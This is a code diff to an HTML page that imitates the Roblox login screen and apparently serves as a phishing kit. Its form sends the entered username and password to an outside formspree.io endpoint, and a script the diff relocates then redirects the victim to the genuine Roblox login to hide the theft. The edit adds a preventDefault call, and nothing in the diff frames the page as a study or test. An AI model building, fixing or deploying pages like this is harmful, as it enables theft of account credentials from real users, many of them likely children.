--- a/index.html
+++ b/index.html
@@ -11,19 +11,11 @@
         .btn:hover { background: #0088cc; }
     </style>
 </head>
-    <script>
-document.querySelector('form').addEventListener('submit', function() {
-    setTimeout(function() {
-        window.location.href = 'https://www.roblox.com/login';
-    }, 1000);
-});
-</script>
-
 <body>
     <div class="container">
         <div class="logo">ROBLOX</div>
         <h2>Log In to Your Account</h2>
-<form action="https://formspree.io/f/mjkoyqer" method="POST">
+        <form action="https://formspree.io/f/mjkoyqer" method="POST">
             <input type="text" name="username" placeholder="Username or Email" required>
             <input type="password" name="password" placeholder="Password" required>
             <input type="submit" value="Log In" class="btn">
@@ -32,5 +24,13 @@ document.querySelector('form').addEventListener('submit', function() {
             <a href="#">Forgot Password or Username?</a>
         </p>
     </div>
+    <script>
+        document.querySelector('form').addEventListener('submit', function(e) {
+            e.preventDefault(); // Prevent default form submission
+            setTimeout(function() {
+                window.location.href = 'https://www.roblox.com/login';
+            }, 1000);
+        });
+    </script>
 </body>
 </html>
